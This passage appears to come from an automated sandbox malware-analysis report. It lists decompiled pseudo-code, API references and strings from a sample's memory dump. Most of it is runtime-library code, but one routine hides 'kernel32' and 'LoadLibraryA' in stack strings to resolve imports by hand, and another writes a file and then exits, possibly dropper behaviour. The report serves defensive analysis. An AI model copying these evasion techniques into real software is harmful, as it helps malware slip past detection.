									if( *((intOrPtr*)(_t55 + _t23 * 2)) == _t42) {
										break;
									}
									_t23 = _t23 + 1;
									__eflags = _t23 - 0x1f4;
									if(_t23 < 0x1f4) {
										continue;
									}
									break;
								}
								_push(_t42);
								_push( &_v512);
								_v9 = _t42;
								_push(E012C63C0( &_v508));
								_push( &_v508);
								_push(_t61);
								return E01334EDA( &_v508, _t61);
							}
						}
					} else {
						_t20 = E012C8B43(3);
						_pop(_t47);
						if(_t20 != 0 ||  *0x12e2018 != 1) {
							if(_t59 != 0xfc) {
								_t29 = E012C1604(0x12e3288, 0x314, L"Runtime Error!\n\nProgram: ");
								_t68 = _t66 + 0xc;
								if(_t29 != 0) {
									_push(_t42);
									_push(_t42);
									_push(_t42);
									_push(_t42);
									_push(_t42);
									goto L9;
								} else {
									_push(0x104);
									_t59 = 0x12e32ba;
									_push(0x12e32ba);
									_push(_t42);
									 *0x12e34c2 = _t29;
									_push(_t53);
									_t39 = E0136600E(_t29, _t47);
									_t42 = 0x2fb;
									if(_t39 == 0) {
										_t40 = E012C1604(0x12e32ba, 0x2fb, L"<program name unknown>");
										_t68 = _t68 + 0xc;
										if(_t40 != 0) {
											L8:
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											L9:
											E012C38BA(_t42, 0x12e3288, _t59);
										}
									}
								}
								_t31 = E012C8B28(_t59);
								_pop(_t50);
								if(_t31 + 1 > 0x3c) {
									_t37 = 0x12e3244 + E012C8B28(_t59) * 2;
									_t50 = _t37 - _t59 >> 1;
									_t42 = _t42 - (_t37 - _t59 >> 1);
									_t38 = E012C1667(_t37, _t42, L"...", 3);
									_t68 = _t68 + 0x14;
									if(_t38 != 0) {
										goto L8;
									}
								}
								_t59 = 0x314;
								_t33 = E012C158F(0x12e3288, 0x314, L"\n\n");
								_t68 = _t68 + 0xc;
								if(_t33 != 0) {
									goto L8;
								}
								_t35 = E012C158F(0x12e3288, 0x314, _v512);
								_t68 = _t68 + 0xc;
								if(_t35 != 0) {
									goto L8;
								}
								_t20 = E012C89BC(_t50, 0x12e3288, L"Microsoft Visual C++ Runtime Library", 0x12010);
							}
						} else {
							goto L16;
						}
					}
				}
				_pop(_t56);
				_pop(_t60);
				_pop(_t43);
				return E012C8B82(_t20, _t43, _v8 ^ _t63, _t53, _t56, _t60);
			}

0x012c261a
0x012c261d
0x012c261f
0x012c2625
0x012c262c
0x012c2631
0x012c263b
0x012c263d
0x012c2640
0x012c2648
0x012c2650
0x012c2655
0x012c2659
0x012c2766
0x012c2766
0x012c2768
0x012c276e
0x012c2770
0x012c2772
0x012c2774
0x012c2777
0x012c2779
0x012c2779
0x012c277b
0x012c277e
0x012c2785
0x012c2789
0x00000000
0x00000000
0x012c278b
0x012c278c
0x012c2791
0x00000000
0x00000000
0x00000000
0x012c2791
0x012c2793
0x012c279a
0x012c27a2
0x012c27ab
0x012c27b2
0x012c27b3
0x00000000
0x012c27b4
0x012c2777
0x012c265f
0x012c2661
0x012c2666
0x012c2669
0x012c267e
0x012c2694
0x012c2699
0x012c269e
0x012c275c
0x012c275d
0x012c275e
0x012c275f
0x012c2760
0x00000000
0x012c26a4
0x012c26a4
0x012c26a9
0x012c26ae
0x012c26af
0x012c26b0
0x012c26b6
0x012c26b7
0x012c26bc
0x012c26c3
0x012c26cc
0x012c26d1
0x012c26d6
0x012c26d8
0x012c26da
0x012c26db
0x012c26dc
0x012c26dd
0x012c26de
0x012c26df
0x012c26df
0x012c26df
0x012c26d6
0x012c26c3
0x012c26e5
0x012c26eb
0x012c26ef
0x012c26f7
0x012c2704
0x012c270b
0x012c270f
0x012c2714
0x012c2719
0x00000000
0x00000000
0x012c2719
0x012c2720
0x012c2727
0x012c272c
0x012c2731
0x00000000
0x00000000
0x012c273b
0x012c2740
0x012c2745
0x00000000
0x00000000
0x012c2752
0x012c2757
0x00000000
0x00000000
0x00000000
0x012c2669
0x012c2659
0x012c27bd
0x012c27be
0x012c27c1
0x012c27c8

APIs

_wcslen.LIBCMT ref: 012C26E5
_wcslen.LIBCMT ref: 012C26F2

Part of subcall function 012C89BC: GetProcAddress.KERNEL32(00000000,MessageBoxW,00000000,USER32.DLL,012E3288,00000314,00000000), ref: 012C8A13
Part of subcall function 012C89BC: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 012C8A31
Part of subcall function 012C89BC: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 012C8A41
Part of subcall function 012C89BC: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 012C8A51
Part of subcall function 012C89BC: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 012C8A65

_strlen.LIBCMT ref: 012C27A5

Strings

..., xrefs: 012C2706
Runtime Error!Program: , xrefs: 012C2684
Microsoft Visual C++ Runtime Library, xrefs: 012C274C
<program name unknown>, xrefs: 012C26C5

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D8DA6, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 327

C-Code - Quality: 87%

			E012D8DA6(void* __ebx, signed int* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				short _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				intOrPtr* _t99;
				signed int _t106;
				signed int _t107;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t122;
				signed int _t124;
				signed int _t127;
				signed int _t128;
				intOrPtr _t129;
				void* _t137;
				char* _t138;
				signed int _t143;
				signed int _t148;
				signed int _t154;
				void* _t155;
				signed int _t157;
				void* _t160;
				char* _t164;
				signed int _t178;
				char _t182;
				char _t183;
				unsigned int _t186;
				signed int _t191;
				signed int _t199;
				signed int _t200;
				signed int* _t208;
				signed int _t209;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;

				_t155 = __ebx;
				_v24 = 0x3ff;
				_v8 = 0x30;
				E012C12FE(__ebx,  &_v40, _a24);
				if(_a16 < 0) {
					_a16 = 0;
				}
				_t210 = _a8;
				if(_t210 != 0) {
					__eflags = _a12;
					if(_a12 <= 0) {
						goto L3;
					}
					 *_t210 = 0;
					__eflags = _a12 - _a16 + 0xb;
					if(_a12 > _a16 + 0xb) {
						_t208 = _a4;
						_v16 =  *_t208;
						_t106 = _t208[1];
						_push(_t155);
						_t168 = _t106 >> 0x00000014 & 0x000007ff;
						__eflags = (_t106 >> 0x00000014 & 0x000007ff) - 0x7ff;
						if((_t106 >> 0x00000014 & 0x000007ff) != 0x7ff) {
							L22:
							_t107 = _t106 & 0x80000000;
							__eflags = _t107;
							if(_t107 != 0) {
								 *_t210 = 0x2d;
								_t210 = _t210 + 1;
								__eflags = _t210;
							}
							_t157 = _a20;
							__eflags = _t157;
							asm("sbb ebx, ebx");
							 *_t210 = 0x30;
							 *(_t210 + 1) = ((_t107 & 0xffffff00 | _t157 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
							_t160 = ( ~_t157 & 0xffffffe0) + 0x27;
							__eflags = _t208[1] & 0x7ff00000;
							if((_t208[1] & 0x7ff00000) != 0) {
								 *((char*)(_t210 + 2)) = 0x31;
								_t212 = _t210 + 3;
								__eflags = _t212;
							} else {
								 *((char*)(_t210 + 2)) = 0x30;
								_t212 = _t210 + 3;
								__eflags =  *_t208 | _t208[1] & 0x000fffff;
								if(( *_t208 | _t208[1] & 0x000fffff) != 0) {
									_v24 = 0x3fe;
								} else {
									_v24 = 0;
								}
							}
							_t114 = _t212;
							_t213 = _t212 + 1;
							_a8 = _t114;
							__eflags = _a16;
							if(_a16 != 0) {
								 *_t114 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v40 + 0xbc))))));
							} else {
								 *_t114 = 0;
							}
							_t115 =  *_t208;
							_t178 = _t208[1] & 0x000fffff;
							__eflags = _t178;
							_v12 = _t178;
							if(_t178 > 0) {
								L34:
								_v16 = 0;
								_v12 = 0xf0000;
								do {
									__eflags = _a16;
									if(_a16 <= 0) {
										break;
									}
									_t143 = E012D9C60( *_t208 & _v16, _v8, _t208[1] & _v12 & 0x000fffff) + 0x00000030 & 0x0000ffff;
									__eflags = _t143 - 0x39;
									if(_t143 > 0x39) {
										_t143 = _t143 + _t160;
										__eflags = _t143;
									}
									_t186 = _v12;
									_v8 = _v8 - 4;
									 *_t213 = _t143;
									_t213 = _t213 + 1;
									_a16 = _a16 - 1;
									__eflags = _v8;
									_v16 = (_t186 << 0x00000020 | _v16) >> 4;
									_v12 = _t186 >> 4;
								} while (_v8 >= 0);
								__eflags = _v8;
								if(_v8 < 0) {
									goto L50;
								}
								_t137 = E012D9C60( *_t208 & _v16, _v8, _t208[1] & _v12 & 0x000fffff);
								__eflags = _t137 - 8;
								if(_t137 <= 8) {
									goto L50;
								}
								_t138 = _t213 - 1;
								while(1) {
									_t182 =  *_t138;
									__eflags = _t182 - 0x66;
									if(_t182 == 0x66) {
										goto L44;
									}
									__eflags = _t182 - 0x46;
									if(_t182 != 0x46) {
										__eflags = _t138 - _a8;
										if(_t138 == _a8) {
											_t76 = _t138 - 1;
											 *_t76 =  *(_t138 - 1) + 1;
											__eflags =  *_t76;
										} else {
											_t183 =  *_t138;
											__eflags = _t183 - 0x39;
											if(_t183 != 0x39) {
												 *_t138 = _t183 + 1;
											} else {
												 *_t138 = _t160 + 0x3a;
											}
										}
										goto L50;
									}
									L44:
									 *_t138 = 0x30;
									_t138 = _t138 - 1;
								}
							} else {
								__eflags = _t115;
								if(_t115 <= 0) {
									L50:
									__eflags = _a16;
									if(_a16 > 0) {
										E012C8BA0(_t213, 0x30, _a16);
										_t213 = _t213 + _a16;
										__eflags = _t213;
									}
									_t116 = _a8;
									__eflags =  *_t116;
									if( *_t116 == 0) {
										_t213 = _t116;
									}
									__eflags = _a20;
									 *_t213 = ((_t116 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
									_t199 = _t208[1];
									_t122 = E012D9C60( *_t208, 0x34, _t199);
									_t200 = _t199 & 0;
									_t124 = (_t122 & 0x000007ff) - _v24;
									__eflags = _t124;
									_push(0);
									_pop(0x3e8);
									asm("sbb edx, ecx");
									if(__eflags < 0) {
										L58:
										 *(_t213 + 1) = 0x2d;
										_t214 = _t213 + 2;
										__eflags = _t214;
										_t124 =  ~_t124;
										asm("adc edx, ebx");
										_t200 =  ~_t200;
										goto L59;
									} else {
										if(__eflags > 0) {
											L57:
											 *(_t213 + 1) = 0x2b;
											_t214 = _t213 + 2;
											L59:
											_t209 = _t214;
											 *_t214 = 0x30;
											__eflags = _t200;
											if(__eflags < 0) {
												L63:
												__eflags = _t200;
												if(__eflags < 0) {
													L67:
													__eflags = _t214 - _t209;
													if(_t214 != _t209) {
														L71:
														_push(0);
														_push(0xa);
														_push(_t200);
														_push(_t124);
														 *_t214 = E012D9B80() + 0x30;
														_v20 = _t200;
														_t214 = _t214 + 1;
														__eflags = _t214;
														_t124 = 0x3e8;
														_v20 = 0;
														L72:
														_t127 = _t124 + 0x30;
														__eflags = _t127;
														 *_t214 = _t127;
														 *(_t214 + 1) = 0;
														L73:
														__eflags = _v28;
														if(_v28 != 0) {
															_t129 = _v32;
															_t96 = _t129 + 0x70;
															 *_t96 =  *(_t129 + 0x70) & 0xfffffffd;
															__eflags =  *_t96;
														}
														_t128 = 0;
														__eflags = 0;
														L76:
														return _t128;
													}
													__eflags = _t200;
													if(__eflags < 0) {
														goto L72;
													}
													if(__eflags > 0) {
														goto L71;
													}
													__eflags = _t124 - 0xa;
													if(_t124 < 0xa) {
														goto L72;
													}
													goto L71;
												}
												if(__eflags > 0) {
													L66:
													_push(0);
													_push(0x64);
													_push(_t200);
													_push(_t124);
													 *_t214 = E012D9B80() + 0x30;
													_v20 = _t200;
													_t214 = _t214 + 1;
													__eflags = _t214;
													_t124 = 0x3e8;
													_t200 = 0;
													goto L67;
												}
												__eflags = _t124 - 0x64;
												if(_t124 < 0x64) {
													goto L67;
												}
												goto L66;
											}
											if(__eflags > 0) {
												L62:
												_push(0);
												_push(0x3e8);
												_push(_t200);
												_push(_t124);
												 *_t214 = E012D9B80() + 0x30;
												_t214 = _t214 + 1;
												_v20 = _t200;
												_t124 = 0x3e8;
												_t200 = 0;
												__eflags = _t214 - _t209;
												if(_t214 != _t209) {
													goto L66;
												}
												goto L63;
											}
											__eflags = _t124 - 0x3e8;
											if(_t124 < 0x3e8) {
												goto L63;
											}
											goto L62;
										}
										__eflags = _t124;
										if(_t124 < 0) {
											goto L58;
										}
										goto L57;
									}
								}
								goto L34;
							}
						}
						__eflags = 0;
						if(0 != 0) {
							goto L22;
						}
						_t148 = _a12;
						__eflags = _t148 - 0xffffffff;
						if(_t148 != 0xffffffff) {
							_t149 = _t148 + 0xfffffffe;
							__eflags = _t148 + 0xfffffffe;
						} else {
							_t149 = _t148;
						}
						_t164 = _t210 + 2;
						_t128 = E012D8D86(_t208, _t164, _t149, _a16, 0);
						__eflags = _t128;
						if(_t128 == 0) {
							__eflags =  *_t164 - 0x2d;
							if( *_t164 == 0x2d) {
								 *_t210 = 0x2d;
								_t210 = _t210 + 1;
								__eflags = _t210;
							}
							__eflags = _a20;
							 *_t210 = 0x30;
							 *(_t210 + 1) = ((_t128 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
							_t154 = E012D94A0(_t168, _t210 + 2, 0x65);
							_pop(_t191);
							__eflags = _t154;
							if(_t154 != 0) {
								__eflags = _a20;
								 *_t154 = ((_t191 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								 *((char*)(_t154 + 3)) = 0;
							}
							goto L73;
						} else {
							__eflags = _v28;
							 *_t210 = 0;
							if(_v28 != 0) {
								 *(_v32 + 0x70) =  *(_v32 + 0x70) & 0xfffffffd;
							}
							goto L76;
						}
					} else {
						_t99 = E012C22A2();
						_push(0x22);
						L4:
						_pop(_t211);
						 *_t99 = _t211;
						E012C390C();
						if(_v28 != 0) {
							 *(_v32 + 0x70) =  *(_v32 + 0x70) & 0xfffffffd;
						}
						return _t211;
					}
				}
				L3:
				_t99 = E012C22A2();
				_push(0x16);
				goto L4;
			}

0x012d8da6
0x012d8db6
0x012d8dbf
0x012d8dc6
0x012d8dce
0x012d8dd0
0x012d8dd0
0x012d8dd3
0x012d8dd8
0x012d8dfd
0x012d8e00
0x00000000
0x00000000
0x012d8e08
0x012d8e0b
0x012d8e0e
0x012d8e19
0x012d8e1e
0x012d8e21
0x012d8e2e
0x012d8e2f
0x012d8e33
0x012d8e35
0x012d8ecd
0x012d8ecd
0x012d8ed4
0x012d8ed6
0x012d8ed8
0x012d8edb
0x012d8edb
0x012d8edb
0x012d8edc
0x012d8edf
0x012d8eec
0x012d8eee
0x012d8ef1
0x012d8f02
0x012d8f07
0x012d8f09
0x012d8f2f
0x012d8f33
0x012d8f33
0x012d8f0b
0x012d8f0b
0x012d8f1a
0x012d8f1d
0x012d8f1f
0x012d8f26
0x012d8f21
0x012d8f21
0x012d8f21
0x012d8f1f
0x012d8f36
0x012d8f38
0x012d8f39
0x012d8f3c
0x012d8f3f
0x012d8f52
0x012d8f41
0x012d8f41
0x012d8f41
0x012d8f57
0x012d8f59
0x012d8f59
0x012d8f5f
0x012d8f62
0x012d8f6c
0x012d8f6c
0x012d8f6f
0x012d8f76
0x012d8f76
0x012d8f7a
0x00000000
0x00000000
0x012d8f9a
0x012d8f9d
0x012d8fa0
0x012d8fa2
0x012d8fa2
0x012d8fa2
0x012d8fa4
0x012d8fa7
0x012d8fab
0x012d8fb7
0x012d8fb8
0x012d8fbb
0x012d8fc0
0x012d8fc3
0x012d8fc3
0x012d8fc8
0x012d8fcd
0x00000000
0x00000000
0x012d8fe4
0x012d8fe9
0x012d8fed
0x00000000
0x00000000
0x012d8fef
0x012d8ff2
0x012d8ff2
0x012d8ff4
0x012d8ff7
0x00000000
0x00000000
0x012d8ff9
0x012d8ffc
0x012d9004
0x012d9007
0x012d901d
0x012d901d
0x012d901d
0x012d9009
0x012d9009
0x012d900b
0x012d900e
0x012d9019
0x012d9010
0x012d9013
0x012d9013
0x012d900e
0x00000000
0x012d9007
0x012d8ffe
0x012d8ffe
0x012d9001
0x012d9001
0x012d8f64
0x012d8f64
0x012d8f66
0x012d9020
0x012d9020
0x012d9024
0x012d902c
0x012d9034
0x012d9034
0x012d9034
0x012d9037
0x012d903a
0x012d903d
0x012d903f
0x012d903f
0x012d9041
0x012d9050
0x012d9054
0x012d9057
0x012d9063
0x012d9065
0x012d9065
0x012d9068
0x012d9069
0x012d906a
0x012d906c
0x012d907d
0x012d907d
0x012d9081
0x012d9081
0x012d9084
0x012d9086
0x012d9088
0x00000000
0x012d906e
0x012d906e
0x012d9074
0x012d9074
0x012d9078
0x012d908a
0x012d908a
0x012d908c
0x012d908f
0x012d9091
0x012d90b7
0x012d90b7
0x012d90b9
0x012d90d9
0x012d90d9
0x012d90db
0x012d90e8
0x012d90e8
0x012d90ea
0x012d90ec
0x012d90ed
0x012d90f5
0x012d90f7
0x012d90fa
0x012d90fa
0x012d90fb
0x012d90fd
0x012d9100
0x012d9100
0x012d9100
0x012d9102
0x012d9104
0x012d9108
0x012d9108
0x012d910c
0x012d910e
0x012d9111
0x012d9111
0x012d9111
0x012d9111
0x012d9115
0x012d9115
0x012d9117
0x00000000
0x012d9117
0x012d90dd
0x012d90df
0x00000000
0x00000000
0x012d90e1
0x00000000
0x00000000
0x012d90e3
0x012d90e6
0x00000000
0x00000000
0x00000000
0x012d90e6
0x012d90bb
0x012d90c2
0x012d90c2
0x012d90c4
0x012d90c6
0x012d90c7
0x012d90cf
0x012d90d1
0x012d90d4
0x012d90d4
0x012d90d5
0x012d90d7
0x00000000
0x012d90d7
0x012d90bd
0x012d90c0
0x00000000
0x00000000
0x00000000
0x012d90c0
0x012d9098
0x012d909e
0x012d909e
0x012d909f
0x012d90a0
0x012d90a1
0x012d90a9
0x012d90ab
0x012d90ac
0x012d90af
0x012d90b1
0x012d90b3
0x012d90b5
0x00000000
0x00000000
0x00000000
0x012d90b5
0x012d909a
0x012d909c
0x00000000
0x00000000
0x00000000
0x012d909c
0x012d9070
0x012d9072
0x00000000
0x00000000
0x00000000
0x012d9072
0x012d906c
0x00000000
0x012d8f66
0x012d8f62
0x012d8e3b
0x012d8e3d
0x00000000
0x00000000
0x012d8e43
0x012d8e46
0x012d8e49
0x012d8e4f
0x012d8e4f
0x012d8e4b
0x012d8e4b
0x012d8e4b
0x012d8e57
0x012d8e5d
0x012d8e65
0x012d8e67
0x012d8e82
0x012d8e85
0x012d8e87
0x012d8e8a
0x012d8e8a
0x012d8e8a
0x012d8e8b
0x012d8e8f
0x012d8e9b
0x012d8ea4
0x012d8eaa
0x012d8eab
0x012d8ead
0x012d8eb3
0x012d8ec2
0x012d8ec4
0x012d8ec4
0x00000000
0x012d8e69
0x012d8e69
0x012d8e6d
0x012d8e70
0x012d8e79
0x012d8e79
0x00000000
0x012d8e70
0x012d8e10
0x012d8e10
0x012d8e15
0x012d8de1
0x012d8de1
0x012d8de2
0x012d8de4
0x012d8ded
0x012d8df2
0x012d8df2
0x00000000
0x012d8df6
0x012d8e0e
0x012d8dda
0x012d8dda
0x012d8ddf
0x00000000

APIs

Part of subcall function 012C12FE: __getptd.LIBCMT ref: 012C1311

__cftoe.LIBCMT ref: 012D8E5D
_strrchr.LIBCMT ref: 012D8EA4
__alldvrm.INT64 ref: 012D90A2
__alldvrm.INT64 ref: 012D90C8
__alldvrm.INT64 ref: 012D90EE

Strings

0, xrefs: 012D8DBF

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D1BBE, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103
library

C-Code - Quality: 58%

			E012D1BBE(intOrPtr _a4, _Unknown_base(*)()* _a8) {
				_Unknown_base(*)()* _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				char _v56;
				void* __ebx;
				short _t35;
				short _t36;
				short _t37;
				short _t38;
				short _t39;
				short _t40;
				short _t41;
				short _t42;
				_Unknown_base(*)()* _t45;
				_Unknown_base(*)()* _t49;
				signed short _t50;
				CHAR* _t51;
				CHAR* _t58;
				struct HINSTANCE__* _t59;
				intOrPtr _t60;
				intOrPtr _t66;
				signed short* _t68;

				_t35 = 0x6b;
				_v56 = _t35;
				_t36 = 0x65;
				_v54 = _t36;
				_t37 = 0x72;
				_v52 = _t37;
				_t38 = 0x6e;
				_v50 = _t38;
				_t39 = 0x65;
				_v48 = _t39;
				_t40 = 0x6c;
				_v46 = _t40;
				_t41 = 0x33;
				_v44 = _t41;
				_t42 = 0x32;
				_v42 = _t42;
				_v40 = 0;
				_v24 = 0;
				_t45 =  *(_a8 + 0x80);
				_v20 = 0x6e72656b;
				_v16 = 0x32336c65;
				_v12 = 0;
				_v36 = 0x64616f4c;
				_v32 = 0x7262694c;
				_v28 = 0x41797261;
				if(_t45 != 0) {
					_t60 = _a4;
					_t45 = _t45 + _t60;
					_a8 = _t45;
					if(_t45 != 0) {
						while(1) {
							_t66 =  *((intOrPtr*)(_t45 + 0x10));
							if(_t66 == 0) {
								break;
							}
							_t25 =  &_v36; // 0x64616f4c
							_t68 = _t66 + _t60;
							_t58 =  *((intOrPtr*)(_t45 + 0xc)) + _t60;
							_t49 = GetProcAddress(E013208F1( &_v56, _t58, _t60), _t58);
							_v8 = _t49;
							_t45 =  *_t49(_t58,  &_v56, _t25);
							_t59 = _t45;
							if(_t59 == 0) {
								L14:
								_t33 =  &_a8;
								 *_t33 = _a8 + 0x14;
								if( *_t33 != 0) {
									_t60 = _a4;
									_t45 = _a8;
									continue;
								}
								break;
							}
							while( *_t68 != 0) {
								_t50 =  *_t68;
								if(_t50 >= 0) {
									_t51 = _t50 + _a4 + 2;
								} else {
									_t51 = _t50 & 0x0000ffff;
								}
								 *_t68 = GetProcAddress(_t59, _t51);
								_t45 = GetProcAddress(_v8("ExitProcess"),  &_v20);
								if( *_t68 == _t45) {
									_t45 =  *0x12dc0c0;
									 *_t68 = _t45;
								}
								_t68 =  &(_t68[2]);
							}
							goto L14;
						}
						return _t45;
					}
				}
				return _t45;
			}

0x012d1bc6
0x012d1bc9
0x012d1bcd
0x012d1bd0
0x012d1bd4
0x012d1bd7
0x012d1bdb
0x012d1bde
0x012d1be2
0x012d1be3
0x012d1be9
0x012d1bea
0x012d1bf0
0x012d1bf1
0x012d1bf7
0x012d1bf8
0x012d1bfe
0x012d1c02
0x012d1c08
0x012d1c0e
0x012d1c15
0x012d1c1c
0x012d1c20
0x012d1c27
0x012d1c2e
0x012d1c37
0x012d1c3d
0x012d1c40
0x012d1c42
0x012d1c45
0x012d1c5c
0x012d1c5c
0x012d1c61
0x00000000
0x00000000
0x012d1c66
0x012d1c6e
0x012d1c70
0x012d1c79
0x012d1c7c
0x012d1c7f
0x012d1c81
0x012d1c85
0x012d1cc3
0x012d1cc3
0x012d1cc3
0x012d1cc7
0x012d1c56
0x012d1c59
0x00000000
0x012d1c59
0x00000000
0x012d1cc7
0x012d1cbe
0x012d1c89
0x012d1c8d
0x012d1c97
0x012d1c8f
0x012d1c8f
0x012d1c8f
0x012d1c9f
0x012d1cae
0x012d1cb2
0x012d1cb4
0x012d1cb9
0x012d1cb9
0x012d1cbb
0x012d1cbb
0x00000000
0x012d1cbe
0x00000000
0x012d1ccb
0x012d1c45
0x012d1ccd

APIs

GetProcAddress.KERNEL32(00000000,32336C65,?,LoadLibraryA), ref: 012D1C79
GetProcAddress.KERNEL32(00000000,?), ref: 012D1C9D
GetProcAddress.KERNEL32(00000000), ref: 012D1CAE

Strings

LoadLibraryA, xrefs: 012D1C66, 012D1C69
kernel32, xrefs: 012D1CA6
ExitProcess, xrefs: 012D1CA1

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D0EDD, Relevance: 9.1, APIs: 6, Instructions: 140

C-Code - Quality: 42%

			E012D0EDD(intOrPtr __eax, int __ebx, void* __edx, void* __edi, intOrPtr* __esi) {
				signed char _t47;
				void* _t49;
				void* _t51;
				int _t52;
				void* _t63;
				int _t70;
				void* _t75;
				int _t80;
				void* _t84;
				void* _t87;
				void* _t89;
				void* _t90;
				intOrPtr* _t92;
				void* _t94;
				void* _t95;
				void* _t96;

				_t92 = __esi;
				_t90 = __edi;
				_t89 = __edx;
				_t80 = __ebx;
				 *((intOrPtr*)(_t96 - 0x10)) = __eax;
				_t47 = 0x60000a -  *((intOrPtr*)(_t96 - 0x10));
				 *(_t96 + 8) = 0x60000a;
				if((_t47 & 0x00000007) != 0) {
					do {
						_t47 = _t47 + 1;
					} while ((_t47 & 0x00000007) != 0);
					 *(_t96 + 8) = _t47;
				}
				_t106 = _t47 - _t80;
				if(_t47 <= _t80) {
					CloseHandle( *(_t96 - 8));
				} else {
					_t51 = E012D02B6(0x12e4f18, _t106);
					_push( *(_t96 + 8));
					if(_t51 != 0) {
						_t52 = E012CDD70(_t89, _t90, _t96);
						_push(_t96 - 0x10);
						_push( *(_t96 + 8));
						 *(_t96 - 0xc) = _t52;
						_push(_t52);
						 *(_t96 + 8) = E012CDC6C(_t80, _t90, _t92,  *(_t96 - 8));
						E012CC788(_t96 - 0x10, _t89, _t92,  *(_t96 - 0xc));
						__eflags =  *(_t96 + 8) - _t80;
						if( *(_t96 + 8) != _t80) {
							CloseHandle( *(_t96 - 8));
							 *((short*)(_t96 - 0x2cc)) = 0;
							E012C8BA0(_t96 - 0x2ca, _t80, 0x206);
							_push(_t96 - 0x2cc);
							E012CF4BA(_t80, _t90, _t92);
							_pop(_t84);
							_t94 =  *_t92(_t96 - 0x2cc, 0xc0000000, 3, _t80, 4, _t90, _t80);
							__eflags = _t94 - 0xffffffff;
							if(__eflags != 0) {
								_push(_t80);
								_t63 = _t96 - 0xc;
								_push(_t63);
								_push( *((intOrPtr*)(_t96 - 0x10)));
								 *(_t96 - 0xc) = _t80;
								_push( *(_t96 + 8));
								_push(_t94);
								_push(_t63);
								E01305FEF(_t63, _t80, __eflags);
								CloseHandle(_t94);
								_push(_t96 + 8);
								_push( *((intOrPtr*)(_t96 - 0x14)));
								_push(_t96 - 0x2cc);
								E012D21C1(_t80, _t84, _t89, _t90, _t94, __eflags);
								E012D1F7B(_t80, _t89, _t90, _t94, __eflags,  *(_t96 + 8));
								ExitProcess(_t80);
							}
						}
					} else {
						 *(_t96 - 0xa4) = _t80;
						_t70 = E012CDD70(_t89, _t90, _t96);
						_t87 = _t96 - 0x10;
						 *(_t96 - 0xc) = _t70;
						 *(_t96 + 8) = E012CDC6C(_t80, _t90, _t92,  *(_t96 - 8));
						CloseHandle( *(_t96 - 8));
						_t95 =  *_t92( *((intOrPtr*)(_t96 - 0x14)), 2, 3, _t80, 3, _t90, _t80, _t70,  *(_t96 + 8), _t87);
						if( *(_t96 + 8) != _t80) {
							_push(_t80);
							_push(_t80);
							_push(_t80);
							_push(_t95);
							_push(_t90);
							_t75 = E01343C0F(_t73);
							_t109 = _t75 - 0xffffffff;
							if(_t75 != 0xffffffff) {
								_push(_t80);
								_push(_t96 - 0xa4);
								_push( *((intOrPtr*)(_t96 - 0x10)));
								_push( *(_t96 + 8));
								_push(_t95);
								_push(_t87);
								E01354037(_t96 - 0xa4, _t87, _t95, _t109);
								CloseHandle(_t95);
							}
							E012CC788(_t87, _t89, _t95,  *(_t96 + 8));
							_pop(_t87);
						}
						E012CC788(_t87, _t89, _t95,  *(_t96 - 0xc));
					}
				}
				_t49 = 0x2b;
				return _t49;
			}

0x012d0edd
0x012d0edd
0x012d0edd
0x012d0edd
0x012d0edd
0x012d0ee5
0x012d0ee8
0x012d0eed
0x012d0eef
0x012d0eef
0x012d0ef0
0x012d0ef4
0x012d0ef4
0x012d0ef7
0x012d0ef9
0x012d105e
0x012d0eff
0x012d0f04
0x012d0f09
0x012d0f0e
0x012d0f99
0x012d0fa2
0x012d0fa3
0x012d0fa6
0x012d0fa9
0x012d0fb5
0x012d0fb8
